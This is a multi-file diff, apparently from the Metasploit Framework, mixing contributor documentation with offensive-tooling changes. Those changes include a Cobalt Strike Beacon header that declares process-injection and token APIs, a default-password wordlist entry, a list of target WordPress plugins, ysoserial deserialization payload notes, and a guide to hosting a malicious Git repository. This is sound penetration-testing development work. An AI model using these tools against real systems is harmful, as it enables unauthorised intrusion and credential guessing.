+# - CLASSIFICATION_ID
+# - CLASSIFICATION_VALUE
+# - CLASSIFICATION_MSG
+# - LOCAL_PATH
+# - FILE_FOLDER_NAME
+# - LAST_ACCESS_TIME
+# - LAST_WRITE_TIME
+# - CREATION_TIME
+# - FILE_ATTRIBUTES
+- FILE_OWNER
+- OWNER_SID
+# - FILE_SIZE
+# - FILETYPE_EXTENSION
+# - IS_HIDDEN
+# - MEDIA_FILE
+# - FILETYPE_EXTENSION_CATEGORY
+DSPEndpointIncidentReport:
+- INCIDENT_ID
+- SOURCE
+# - MODULE_NAME
+# - INCIDENT_TIME
+# - COMPLETION_TIME
+- TIME_GENERATED
+# - MESSAGE
+# - LOCATION
+# - ENDPOINT_ID
+# - INCIDENT_STATUS
+# - VIOLATED_POLICY
+# - DOMAIN_ID
+- ENDPOINT_NAME
+- USERNAME
+# - USER_ID
+# - LAST_ACCESS_TIME
+# - LAST_WRITE_TIME
+# - FILE_SIZE
+# - CREATION_TIME
+# - REPORT_GENERATION_ID
+# - NEW_FILE_NAME
+# - IMAGE_FILE_NAME
+# - FILE_FOLDER_NAME
+- USER_SID
+# - FILETYPE_EXTENSION
+# - IS_USB_EVENT
+- NOTIFY_NAME
+- MAIL_FROM
+- MAIL_TO
+- MAIL_BCC
+- MAIL_CC
+# - MAIL_SUBJECT
+# - MAIL_SENT_TIME
+# - MAIL_CLASSFICATION
+# - PRINTER_NAME
+# - FILENAME
+# - PORT_NAME
+- MACHINE_NAME
+- PRINTER_USERNAME
+# - TOTAL_PAGES
+- CLIENTIPLIST
+- URL
+# - CLASSIFICATION_VALUE
+# - INCIDENT_PROFILE_ID
+# - INCIDENT_PROFILE_NAME
+# - INCIDENT_SEVERITY
+# - PROFILETYPE_ID
+# - PROFILETYPE_NAME
+# - IS_NETWORK_COPY
+# - LAST_KNOWN_COPY
+- CLIENT_HOST
+DspEndpointPrinterAuditReport:
+- UNIQUE_ID
+- TIME_GENERATED
+# - COMPLETION_TIME
+# - SOURCE_ID
+# - ENDPOINT_ID
+- ENDPOINT_NAME
+- USER_SID
+- USER_NAME
+# - PRINTER_NAME
+# - FILENAME
+# - LOCAL_PATH
+# - PORT_NAME
+- MACHINE_NAME
+- PRINTER_USERNAME
+- NOTIFY_NAME
+# - TOTAL_PAGES
+# - FILE_SIZE
+# - CREATION_TIME
+- CLIENTIPLIST
+# - PROFILE_ID
+- PROFILE_NAME
+# - PROFILETYPE_ID
+# - PROFILETYPE_NAME
+DspEndpointWebAuditReport:
+- UNIQUE_ID
+- TIME_GENERATED
+# - SOURCE_ID
+# - ENDPOINT_ID
+- ENDPOINT_NAME
+- USER_SID
+- USER_NAME
+# - NEW_FILE_NAME
+# - FILE_SIZE
+# - FILETYPE_EXTENSION
+# - PROCESS_NAME
+# - MESSAGE
+# - URL
+- CLIENT_IP
+# - PROFILE_ID
+- PROFILE_NAME
+DSPFileAnalysisAlerts:
+- INCIDENT_ID
+# - VIOLATED_PROFILE
+# - SERVER_ID
+# - DRIVE_LETTER
+# - SOURCE_ID
+- TIME_GENERATED
+# - SECURITY_ID
+- SERVERNAME
+# - FILE_ATTRIBUTES
+# - LAST_ACCESS_TIME
+# - LAST_WRITE_TIME
+# - FILE_SIZE
+# - CREATION_TIME
+# - REPORT_GENERATION_ID
+# - YEAR_CREATED
+# - FILE_FOLDER_NAME
+# - LOCAL_PATH
+# - FILETYPE_EXTENSION
+# - IS_HIDDEN
+# - IS_DIRECTORY
+# - IS_STALE
+# - NON_BUSINESS_FILE
+# - FILETYPE_EXTENSION_CATEGORY
+RAAlertHistory:
+- INCIDENT_ID
+# - FILE_NAME
+# - FILE_TYPE
+# - LOCATION
+- SERVER_NAME
+# - POLICY_ID
+# - POLICY_NAME
+- TIME_GENERATED
+# - NO_OF_OCCURRENCES
+- FILE_OWNER
+# - DATA_SOURCE
+# - RISK_SCORE
+# - ENTITY_ID
+RAIncidents:
+- INCIDENT_ID
+# - FILE_NAME
+# - FILE_TYPE
+# - LOCATION
+- SERVER_NAME
+# - POLICY_ID
+# - POLICY_NAME
+- TIME_GENERATED
+# - NO_OF_OCCURRENCES
+- FILE_OWNER
+# - DATA_SOURCE
+# - RAISED_INCIDENT
+# - SOURCE_ID
+# - RISK_SCORE
+# - VIOLATION_SCORE
+# - POLICY_SCORE
+# - PERMISSION_SCORE
+# - AUDIT_SCORE
+# - USER_SCORE
+# - SCORE_DESCRIPTION
+# - ENTITY_ID
@@ -0,0 +1,69 @@
+/*
+ * Beacon Object Files (BOF)
+ * -------------------------
+ * A Beacon Object File is a light-weight post exploitation tool that runs
+ * with Beacon's inline-execute command.
+ *
+ * Additional BOF resources are available here:
+ *   - https://github.com/Cobalt-Strike/bof_template
+ *
+ * Cobalt Strike 4.x
+ * ChangeLog:
+ *    1/25/2022: updated for 4.5
+ */
+
+/* data API */
+typedef struct {
+	char * original; /* the original buffer [so we can free it] */
+	char * buffer;   /* current pointer into our buffer */
+	int    length;   /* remaining length of data */
+	int    size;     /* total size of this buffer */
+} datap;
+
+DECLSPEC_IMPORT void    BeaconDataParse(datap * parser, char * buffer, int size);
+DECLSPEC_IMPORT char *  BeaconDataPtr(datap * parser, int size);
+DECLSPEC_IMPORT int     BeaconDataInt(datap * parser);
+DECLSPEC_IMPORT short   BeaconDataShort(datap * parser);
+DECLSPEC_IMPORT int     BeaconDataLength(datap * parser);
+DECLSPEC_IMPORT char *  BeaconDataExtract(datap * parser, int * size);
+
+/* format API */
+typedef struct {
+	char * original; /* the original buffer [so we can free it] */
+	char * buffer;   /* current pointer into our buffer */
+	int    length;   /* remaining length of data */
+	int    size;     /* total size of this buffer */
+} formatp;
+
+DECLSPEC_IMPORT void    BeaconFormatAlloc(formatp * format, int maxsz);
+DECLSPEC_IMPORT void    BeaconFormatReset(formatp * format);
+DECLSPEC_IMPORT void    BeaconFormatAppend(formatp * format, char * text, int len);
+DECLSPEC_IMPORT void    BeaconFormatPrintf(formatp * format, char * fmt, ...);
+DECLSPEC_IMPORT char *  BeaconFormatToString(formatp * format, int * size);
+DECLSPEC_IMPORT void    BeaconFormatFree(formatp * format);
+DECLSPEC_IMPORT void    BeaconFormatInt(formatp * format, int value);
+
+/* Output Functions */
+#define CALLBACK_OUTPUT      0x0
+#define CALLBACK_OUTPUT_OEM  0x1e
+#define CALLBACK_OUTPUT_UTF8 0x20
+#define CALLBACK_ERROR       0x0d
+
+DECLSPEC_IMPORT void   BeaconOutput(int type, char * data, int len);
+DECLSPEC_IMPORT void   BeaconPrintf(int type, char * fmt, ...);
+
+
+/* Token Functions */
+DECLSPEC_IMPORT BOOL   BeaconUseToken(HANDLE token);
+DECLSPEC_IMPORT void   BeaconRevertToken();
+DECLSPEC_IMPORT BOOL   BeaconIsAdmin();
+
+/* Spawn+Inject Functions */
+DECLSPEC_IMPORT void   BeaconGetSpawnTo(BOOL x86, char * buffer, int length);
+DECLSPEC_IMPORT void   BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len);
+DECLSPEC_IMPORT void   BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len);
+DECLSPEC_IMPORT BOOL   BeaconSpawnTemporaryProcess(BOOL x86, BOOL ignoreToken, STARTUPINFO * si, PROCESS_INFORMATION * pInfo);
+DECLSPEC_IMPORT void   BeaconCleanupProcess(PROCESS_INFORMATION * pInfo);
+
+/* Utility Functions */
+DECLSPEC_IMPORT BOOL   toWideChar(char * src, wchar_t * dst, int max);
@@ -0,0 +1,2 @@
+$someText = "Hello!" ; $someText > "C:\flag.txt"
+
@@ -1,3 +1,4 @@
 calvin
 123456
 password
+user1234
@@ -54,3 +54,4 @@ easy-wp-smtp
 duplicator_download
 custom-registration-form-builder-with-submission-manager
 woocommerce-abandoned-cart
+elementor
@@ -293,6 +293,15 @@ module Build
        '@scanner',
        '@yieldparam',
        '@yieldreturn',
+        '@compressed',
+        '@content',
+        '@path',
+        '@sha1',
+        '@type',
+        '@git_repo_uri',
+        '@git_addr',
+        '@git_objs',
+        '@refs',
      ]

      # Replace any dangling github usernames, i.e. `@foo` - but not `[@foo](http://...)` or `email@example.com`
@@ -6,6 +6,9 @@ However, tackling core Metasploit Framework bugs or particularly squirrelly expl

 Metasploit is a tool by and for hackers, but the hackers that maintain it also happen to be software engineers. So, we have some hopefully easy-to-remember Do's and Don'ts in [CONTRIBUTING.md](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md). Read up on those.

+# Making Your First PR
+Our preferred method of module submission is via a git pull request from a feature branch on your own fork of Metasploit. You can learn more about making your first PR at [[Creating Your First PR]]
+
 # Server exploits

 Server exploits are always in demand; why bother with complicated social engineering campaigns when you can go straight to the pain point of a vulnerable network. Here are some search queries to get you started:
@@ -53,9 +56,6 @@ Again, there's always room on #metasploit on Freenode. Be helpful with the quest

 You probably shouldn't run proof of concept exploit code you find on the Internet on a machine you care about in a network you care about. That is generally considered a Bad Idea. You also probably shouldn't use your usual computer as a target for exploit development, since you are intentionally inducing unstable behavior.

-Our preferred method of module submission is via a git pull request from a feature branch on your own fork of Metasploit.  You can learn how to create one here:
-[[Landing-Pull-Requests]]
-
 Also, please take a peek at our guides on using git and our acceptance guidelines for new modules in case you're not familiar with them.

 If you get stuck, try to explain your specific problem as best you can on our [Freenode IRC](https://freenode.net/) channel, #metasploit (joining requires a [registered nick](https://freenode.net/kb/answer/registration)). Someone should be able to lend a hand. Apparently, some of those people never sleep.
@@ -0,0 +1,136 @@
+# Creating Your First PR - An Intro To Git and the PR Process
+## Intro
+Congratulations fellow traveler, so you're interested in contributing to Metasploit eh? Well welcome aboard, its going to be a fun ride!
+You'll learn lots along the way but here are some tips and tricks that should help you get started with making your first PR request
+whilst also avoiding some common pitfalls and learning how some of our systems work.
+
+## Initial Steps and Important Notes
+The rest of this guide assumes you have already followed the steps at [Setting Up A Developer Environment](https://r-7.co/MSF-DEV) in order to get
+a fork of Metasploit set up and ready to run, and that you have added in your SSH keys 
+(see [Adding a New SSH Key To Your GitHub Account](https://docs.github.com/en/authentication/connecting-to-github-with-ssh/adding-a-new-ssh-key-to-your-github-account)), 
+set up Ruby and optionally the PostgreSQL database, and done any custom shortcuts you wish to configure.
+
+## Getting the Latest Version of Metasploit Framework
+Before making any new contributions, you will want to sure you are running the latest version of Metasploit Framework.
+To do this run `git checkout master && git fetch upstream && git pull`, where `upstream` is the branch connected to the 
+Rapid7 remote, aka Rapid7's copy of the code. You can verify that `upstream` is set correctly by running `git remote get-url upstream`
+and verifying it is set to `git@github.com:rapid7/metasploit-framework.git`.
+
+Once you run this command, it will check out the `master` branch, then fetch all
+the changes from `upstream` (which should be configured to be Rapid7's copy of Metasploit Framework on GitHub). Once
+it has cached these changes, the `git pull` command will then pull these changes into the current branch, aka `master`.
+
+Not pulling down changes before writing new code could lead to big issues down the line, particularly if someone has edited a file
+you intended to modify. In that case maintainers will then have to try find the right combination of changes to implement, which could lead
+to your PR being rejected if these changes are too complex.
+
+## Making Sure Your Gems Are Updated
+The next step is to make sure you have the latest copy of the Gems that Metasploit Framework depends on. This can be done by running `bundle install`
+from the same directory as where the `Gemfile.lock` file is located, which will be in the same folder as wherever you cloned your fork to locally.
+
+Doing this will allow you to make sure that you are running the latest libraries, which will ensure if you do encounter any bugs whilst
+developing code, those bugs are not related to out of date Gems being installed, and are therefore potentially legitimate bugs that need fixing.
+
+## Creating a New Branch for Your Code
+Once all of this is done, you will want to create a new branch for your code, which can be done by running `git checkout -b <your branch name here>`.
+This will snapshot the current branch that you are on, and use that to create a new branch with the name provided. Note that I did say snapshot. This is
+why it's important to update the current branch's code to the latest version of Metasploit Framework available prior to running this command,
+otherwise the new branch will contain outdated code.
+
+## Adding in Your Changes and Creating Meaningful Commit Messages
+Once you have made your code changes, add them using `git add <path to file to add> <optional path to second file to add>`. Note that you can
+specify multiple files to add using `git add` at the same time.
+
+To commit these changes locally, use `git commit -m "<commit message here>"`. Note that as a general rule of thumb, commit messages should aim
+to be 50 characters or less while telling readers what was changed in that commit. You generally don't want to create commits that do multiple things at once,
+instead create a separate commit for each group of items that you are changing, and make sure that the commit message reflects what changed in a general sense.
+
+Note also that maintainers may end up squashing your commits down so that your commit A, B, and C, now become commit D which
+contains all of the same changes as commit A, B, and C, but in one commit and with one associated commit message. This is often
+done when the code is ready to be landed into Metasploit Framework to help make the commit history easier for people to read.
+
+## Checking for Code Errors
+Before code can be accepted into Metasploit Framework, it must also pass our RuboCop and MsfTidy rules. These help ensure that
+all contributors are committing code that follows a common set of standards. To check if your code meets our RuboCop standards, 
+from the root of wherever you cloned your fork of Metasploit Framework to on disk, run `rubocop <path to your module from current directory>`.
+
+Specifying the `-a` parameter will ask RuboCop to check your module and if possible fix any issues that RuboCop is able to fix.
+In this case the command would be `rubocop -a <path to your module from current directory>`. It is encouraged to keep running 
+this command and fixing any issues that come up until RuboCop no longer comes back with any errors to report. Once this is 
+complete, run `git add <file>` followed by `git commit -m "RuboCop Fixes"`. You can change the commit message if you 
+want, but it should mention RuboCop as it helps maintainers know what the commit is related to.
+
+As a good practice rule, you should always separate your commits that contain RuboCop changes from those that contain non-RuboCop related changes.
+This helps ensure that when it comes time to review your code, review can proceed a lot quicker and more efficiently.
+
+Note that special cases exist if you are writing library code as our RuboCop rules are primarily designed to be run against modules.
+If at any point you are confused r.e this, please feel free to reach out and ask us for help on Slack at https://metasploit.com/slack.
+
+Once this is done, the next tool to run is located in the root of the Metasploit local fork at `tools/dev/msftidy.rb`. You will want to run this tool
+against your module code (if applicable), using `tools/dev/msftidy.rb <path to module>`. This will give some output if there are any errors, or no output
+if your module passed the tests. Try and fix any errors mentioned here.
+
+## Writing Documentation
+The next step to do, if you are writing a module, is to write the documentation for the module. You can find some information 
+on how to write module documentation at [Writing Module Documentation](https://docs.metasploit.com/docs/development/quality/writing-module-documentation.html).
+
+In general when writing documentation you will want to search for a similar documentation file under the `documentation`
+folder located in the root of the Metasploit fork. You can then copy one of these files and use it as the basis for writing
+your new documentation for your module.
+
+When writing the information for the documentation, be sure to make sure your installation steps are as clear as possible. Any confusion over
+how to set up the target to be exploited will likely result in delays. You will want to put as much detail here as possible.
+
+Additionally any information about caveats, scenarios you have tested, custom options you added in, or quirks you noticed
+should also go into this file.
+
+## Checking Documentation Syntax
+Once you have written the documentation, you then want to run `toos/dev/msftidy_docs.rb <path to documentation file>`. This will report on any
+errors with your documentation file, which you will want to fix before submitting your PR. Notice however that if you get a warning about long lines,
+these may be okay to ignore depending on the context. A good example is if a line is long merely because of a URL. Such warnings can be
+safely ignored.
+
+## Submitting Your Changes and Opening a PR
+Once you have gone through all of the steps above you should be ready to submit your PR. To submit your PR, first check which 
+branch points to your copy of the code. If you have followed the setup guide, it should be `origin`. You can double check this 
+branch's remote URL using `git remote get-url origin`. It should look something like `git@github.com:gwillcox-r7/metasploit-framework`
+with `gwillcox-r7` substituted for your username.
+
+Assuming the `origin` branch is in fact pointing to your copy of the code, run `git push origin local-branch:remote-branch` 
+and replace `local-branch` with the branch locally where your code changes are located, and `remote-branch` with what 
+you want this branch to be called on the remote repository, aka `origin` which will be your fork on GitHub.com. In most 
+cases you will want these two names to be the same to avoid confusion, but its good to know this syntax should you 
+start working with more complex situations. Note that if the branch pointing to your copy of the code is not named `origin`,
+replace the word `origin` in the command above with the name of the branch that does point to your copy of the code.
+
+This should result in output similar to the following:
+
+```
+> git push origin update_mssql_lib_parameters:update_mssql_lib_parameters
+Enumerating objects: 15, done.
+Counting objects: 100% (15/15), done.
+Delta compression using up to 2 threads
+Compressing objects: 100% (8/8), done.
+Writing objects: 100% (8/8), 1.55 KiB | 1.55 MiB/s, done.
+Total 8 (delta 7), reused 0 (delta 0), pack-reused 0
+remote: Resolving deltas: 100% (7/7), completed with 7 local objects.
+remote: 
+remote: Create a pull request for 'update_mssql_lib_parameters' on GitHub by visiting:
+remote:      https://github.com/gwillcox-r7/metasploit-framework/pull/new/update_mssql_lib_parameters
+remote: 
+To github.com:gwillcox-r7/metasploit-framework
+ * [new branch]            update_mssql_lib_parameters -> update_mssql_lib_parameters
+```
+
+To create a new pull request (aka PR), browse to the URL mentioned in this output. In this case for the output above this would
+be `https://github.com/gwillcox-r7/metasploit-framework/pull/new/update_mssql_lib_parameters`.
+
+This will open a new template to create a PR request. Please follow all of the directions here and provide the requested details whilst also
+deleting the template text once you have provided the requested information. Note that PRs that do not provide anything but the template text for
+their description will be closed.
+
+In your PR description you should take care to mention what it is that you are submitting, details on the type of vulnerability and CVE-ID,
+if applicable, how to test the submission, as well as any special concerns or items of note that occurred whilst conducting testing.
+
+Once this is done a member of our team will review your PR within a few days and provide feedback on any changes that may still need to be made
+before the submission can be accepted.
@@ -12,8 +12,10 @@ The pgp signatures below can be verified with the following [public key](https:/

 |Download Link|File Type|SHA1|PGP|
 |-|-|-|-|
-| [metasploit-4.21.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.asc)|
-| [metasploit-4.21.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.asc)|
+| [metasploit-4.21.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.asc)|
+| [metasploit-4.21.1-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.asc)|
+| [metasploit-4.21.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-windows-x64-installer.exe.asc)|
+| [metasploit-4.21.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-linux-x64-installer.run.asc)|
 | [metasploit-4.20.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-windows-x64-installer.exe.asc)|
 | [metasploit-4.20.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-linux-x64-installer.run.asc)|
 | [metasploit-4.19.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.1-2021073101-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.1-2021073101-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.1-2021073101-windows-x64-installer.exe.asc)|
@@ -29,7 +29,7 @@ Once the serialized object is generated and stored as `java_payload`, it's then
 ### `#generate_java_deserialization_for_payload(name, payload)`
 This method will generate a serialized Java object that when loaded will execute the specified Metasploit payload. The payload will be converted to an operating system command using one of the supported techniques contained within this method and then passed to [`#generate_java_deserialization_for_command`](#generate_java_deserialization_for_commandname-shell-command).
 
- **name** - The payload name parameter must be one of the supported payloads stored in the `ysoserial` cache.  As of this writing, the list includes: `BeanShelll1`, `Clogure`, `CommonBeanutils1`, `CommonsCollections2`, `CommonsCollections3`, `CommonsCollections4`, `CommonsCollections5`, `CommonsCollections6`, `Groovy1`, `Hibernate1`, `JBossInterceptors1`, `JRMPClient`, `JSON1`, `JavassistWeld1`, `Jdk7u21`, `MozillaRhino1`, `Myfaces1`, `ROME`, `Spring1`, `Spring2`, and `Vaadin1`.  While `ysoserial` includes additional payloads that are not listed above, they are unsupported by the library due to the need for complex inputs.  Should there be use cases for additional payloads, please consider opening an issue and submitting a pull request to add support.
+- **name** - The payload name parameter must be one of the supported payloads stored in the `ysoserial` cache.  As of this writing, the list includes: `BeanShelll1`, `Clogure`, `CommonsBeanutils1`, `CommonsCollections2`, `CommonsCollections3`, `CommonsCollections4`, `CommonsCollections5`, `CommonsCollections6`, `Groovy1`, `Hibernate1`, `JBossInterceptors1`, `JRMPClient`, `JSON1`, `JavassistWeld1`, `Jdk7u21`, `MozillaRhino1`, `Myfaces1`, `ROME`, `Spring1`, `Spring2`, and `Vaadin1`.  While `ysoserial` includes additional payloads that are not listed above, they are unsupported by the library due to the need for complex inputs.  Should there be use cases for additional payloads, please consider opening an issue and submitting a pull request to add support.
 
 - **payload** - The payload object to execute on the remote system. This is the native Metasploit payload object and it will be automatically converted to an operating system command using a technique suitable for the target platform and architecture. For example, x86 Windows payloads will be converted using a Powershell command. Not all platforms and architecture combinations are supported. Unsupported combinations will result in a `RuntimeError` being raised which will need to be handled by the module developer.

@@ -169,4 +169,4 @@ DONE!  Successfully generated 0 static payloads and 22 dynamic payloads.  Skippe
 At completion, the `data/ysoserial_payloads.json` file is overwritten and the 22 dynamic payloads are ready for use within the framework.  Afterward, the developer should follow the standard `git` procedures to `add` and `commit` the new JSON file  before generating a pull request and landing the updated JSON into the framework's `master` branch.

 [1]: https://github.com/pimps/ysoserial-modified/blob/e71f70dbc5e8c27d72873014ac5cb7766f4b5b94/src/main/java/ysoserial/payloads/util/CmdExecuteHelper.java#L11-L30
-[2]: https://github.com/rapid7/metasploit-framework/blob/d580e7d12218fbf62b190a0c0c6d25f43b8aa5be/modules/exploits/multi/http/shiro_rememberme_v124_deserialize.rb
+[2]: https://github.com/rapid7/metasploit-framework/blob/d580e7d12218fbf62b190a0c0c6d25f43b8aa5be/modules/exploits/multi/http/shiro_rememberme_v124_deserialize.rb
@@ -84,6 +84,10 @@ OptSomething.new(option_name, [boolean, description, value, *enums*], aliases: *
 * **conditions** - *optional*, *key-word only* An array of a condition for which the option should be displayed. This
  can be used to hide options when they are irrelevant based on other configurations. See the [Filtering datastore
  options](#Filtering-datastore-options) section for more information.
+* **fallbacks** *optional*, *key-word only* An array of names that will be used as a fallback if the main option name is
+  defined by the user. This is useful in the scenario of wanting specialised option names such as `SMBUser`, but to also
+  support gracefully checking a list of more generic fallbacks option names such as `Username`. This functionality is 
+  currently behind a feature flag, set with `features set datastore_fallbacks true` in msfconsole

 Now let's talk about what classes are available:

@@ -0,0 +1,399 @@
+This page walks through the process of creating an exploit module for vulnerable Git clients.
+
+### Building a Repository
+
+Many of the existing Git exploits in Metasploit rely on being able to host a valid repository that a Git client can successfully clone. So to get started with building an exploit, the contents of the repo need to be decided on first.
+
+Let's say that the repository is something like the following:
+
+```
+space@vm:~/test-repo$ ls -al
+total 20
+drwxrwxr-x  4 space space 4096 Sep 16 14:06 .
+drwxr-x--- 23 space space 4096 Sep 16 14:05 ..
+drwxrwxr-x  2 space space 4096 Sep 16 14:06 dir
+-rw-rw-r--  1 space space   10 Sep 16 14:06 file.txt
+drwxrwxr-x  7 space space 4096 Sep 16 14:06 .git
+space@vm:~/test-repo$ ls -al dir
+total 12
+drwxrwxr-x 2 space space 4096 Sep 16 14:06 .
+drwxrwxr-x 4 space space 4096 Sep 16 14:06 ..
+-rw-rw-r-- 1 space space    5 Sep 16 14:06 test_file.txt
+```
+
+The `.git` directory is the only component of the repository that won't be sent,
+so the repository will consist of the `file.txt`, the `dir` folder, and the `test_file.txt` file that lives within the `dir`  folder. Every file and directory inside the repo is represented as a Git object: File contents are represented as blob objects which get coupled together to form a tree object. Lastly, a commit object is created to hold information about the tree object, including the tree's sha, the author of the commit, a commit message, etc.
+
+There will need to be two tree objects to represent the contents of `dir` and the contents
+of the root of the repository. Starting with the contents of `dir`, a blob object
+needs to be created to represent the contents of `test_file.txt`:
+
+```
+space@vm:~/test-repo$ cat dir/test_file.txt 
+test
+```
+
+The [Git mixin][1] contains the functionality for building a Git object.
+To build a blob object, the `build_blob_object()` class method should be used:
+
+```
+>> contents = "test\n"
+=> "test\n"
+>> blob = Msf::Exploit::Git::GitObject.build_blob_object(contents)
+=> 
+#<Msf::Exploit::Git::GitObject:0x00007fe163c75cd0                                            
+```
+
+The resulting object will contain the object type, its original contents,
+its compressed contents, its sha, and its path (where the commit object will
+be stored client side). Since this will be the only file in the `dir` folder,
+the tree object can be created with `Msf::Exploit::Git::GitObject.build_tree_object()`.
+A tree object is represented differently, holding information about each file contained
+in the directory, such as file permissions, file name, object type, and the file's sha1 hash.
+Because of that, the `build_tree_object()` expects a hash or an array of hashes,
+where each hash looks like the following:
+
+```
+>> tree_entry =
+{
+	mode: '100644',
+	file_name: 'test_file.txt',
+	sha1: blob.sha1
+}
+```
+
+And using that, the tree object can now be created:
+
+```
+>> tree_object = Msf::Exploit::Git::GitObject.build_tree_object(tree_entry)
+=> 
+#<Msf::Exploit::Git::GitObject:0x00007fe161b0cd78
+```
+
+Now that the `dir` folder is represented in Git objects, we can represent the root
+of the repository. That just requires creating a `blob` object for `file.txt`,
+creating a `tree` object representing the top-level directory, and finally a commit object.
+
+Again, a blob object needs to be created to represent the contents of the remaining file:
+
+```
+space@vm:~/test-repo$ cat file.txt
+some text
+```
+
+```
+>> contents = "some text\n"
+=> "some text\n"
+>> file_blob = Msf::Exploit::Git::GitObject.build_blob_object(contents)
+=> 
+#<Msf::Exploit::Git::GitObject:0x00007fe163bf54b8                                              
+...                                                                                            
+```
+
+Then, a new tree object needs to be created to represent the top-level directory,
+which includes `file.txt` and the `dir` folder:
+
+```
+?> entries = [
+?>   {
+?>     mode: '100644',
+?>     file_name: 'file.txt',
+?>     sha1: file_blob.sha1
+?>   },
+?>   {
+?>     mode: '040000',
+?>     file_name: 'dir',
+?>     sha1: tree_object.sha1
+?>   }
+>> ]
+=> [{:mode=>"100644", :file_name=>"file.txt", :sha1=>"b649a9bf89116c581f8329b8ec3c79a86a70...
+>> top_level_obj = Msf::Exploit::Git::GitObject.build_tree_object(entries)
+```
+
+The `build_commit_object()` method takes a hash that expects the sha1 hash for
+the tree created, the sha1 hash for the parent commit if one exists, and optional
+data such as an author name, email address, company name, commit message, etc.
+If the user chooses not to pass in data for the optional data, `Faker` will generate
+random data for them.
+
+```
+>> commit_object = Msf::Exploit::Git::GitObject.build_commit_object(tree_sha1: top_level_obj.sh
+a1)
+=> 
+#<Msf::Exploit::Git::GitObject:0x00007fe1533ac848                                              
+...                                                                                            
+>> commit_object
+=> 
+#<Msf::Exploit::Git::GitObject:0x00007fe1533ac848                                              
+ @compressed=                                                                                  
+  "x\x9C\x95\xCEA\x0E\xC2 \x10\x05P\xD7\x9Cb<@\r\x1DZ\xCA\xC2\x18\xE3\xCE\xA8g0XF!\xB6\xD0\x00]x{I\xED\x05\\\xCD\xE4'\xF3\xFE\xF4a\x1C]\x06\x14j\x93#\x11pe\b\el5u]cL#\xD1\x18\xC9\x05\x97\x92\x04*\xF3h\xA5P}\xC7\x89\xE99\xDB\x10\xE1\xEA\x92\xF6&j\xB8\xCC\x93\xD5\x03\xEC\xDF\xCB\xBC\x0Fk~\xB43\ri\xE7)\x1F\xA0\xAEU[\x10l\x05T\x85\xE4\xAC_\xCA3\xFD\xC7\xA8\x0E%\nQ\xE3\xAA\xB0\xB3w\xD9\x95\xA3\x1F\a9@\x98\xC8\xC3\xAB\xEC\x91\xA6\x90\\\x0E\xF1\x03\xCF\xF2\xED\xC9\xF9T\xDD\x82\x8D[\xF6\x05s\xF7P\x89",                                                                       
+ @content=                                                                                     
+  "tree 08de2425ae774dd462dd603066e328db5638c70e\nauthor Lisandra Kuphal <kuphal_lisandra@huels.net> 1185328253 -0300\ncommitter Lisandra Kuphal <kuphal_lisandra@huels.net> 872623312 -0300\n\nInitial commit to open git repository for Bins-Mohr!\n",
+ @path="01/8856fe17403b0991e5d1d3eb7f62dca4d8e951",
+ @sha1="018856fe17403b0991e5d1d3eb7f62dca4d8e951",
+ @type="commit">
+```
+
+That's all that is needed to create a valid repository in Metasploit.
+
+### Hosting the Repository
+
+Metasploit's current implementation of the Git protocol works over HTTP ([SmartHttp docs][3]),
+so to host a malicious repository with Metasploit, the exploit module needs to
+leverage the `Msf::Exploit::Remote::HttpServer` mixin. Additionally,
+the [Git][1] and [Git SmartHttp][2] mixins need to be included to build objects
+and create appropriate responses for the client's requests.
+
+The module should look similar to other exploit modules that use the HttpServer mixin,
+defining an `on_request_uri()` method, a `primer()` method, and an `exploit()` method.
+The `primer()` method is first to execute, so setup for things like the repository uri
